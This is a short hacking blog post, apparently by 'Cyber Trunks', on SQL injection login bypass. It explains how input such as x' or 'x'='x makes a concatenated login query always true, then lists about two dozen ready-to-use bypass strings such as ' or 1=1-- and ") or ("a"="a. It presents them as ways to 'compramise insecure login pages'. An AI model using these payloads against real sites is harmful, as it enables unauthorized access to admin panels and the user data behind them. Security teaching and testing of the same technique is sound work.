Your Ad Here

hello frnds,

Well i m going to describe you some sql strings which we use to compramise insecure login pages.

but only using the given string will make you script kiddie so going to explain it how it works.

Generaly Dynamic websites are related to Databases which stores information regarding every thing like user login id and pass and all.

so this data is fetched in sites using sql queries. in general term sql queries are commands used in Database providing softwares. eg:-MS SQL server, Oracle, MS Access , MySQL etc.

now the main part when user have to check and compare data in database they use one query.
(in login page they have to match data provided by user and data exist in database table if matches give you further access) for checking this info they use below query.

select * from tbladmin where adminid="' & txtfiels & '" and pass="' & txtpass & '"

when you use the strings like x' or 'x'='x
it will make this query as

select * from tbladmin where adminid=" 'x' or 'x'='x' " and pass=" ' x' or 'x'='x' "

and as per query x is always =(equal) to x it writes true and gives entry to the user into admin panel.

this is how sql authentication bypass vuln work.

below are some common strings used in this.


x' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

You can also create your own string using your logic

Posted by Cyber Trunks


Cool CyberPUnk said...

Good Strings
by->Cool CyberPunk

Your Ad Here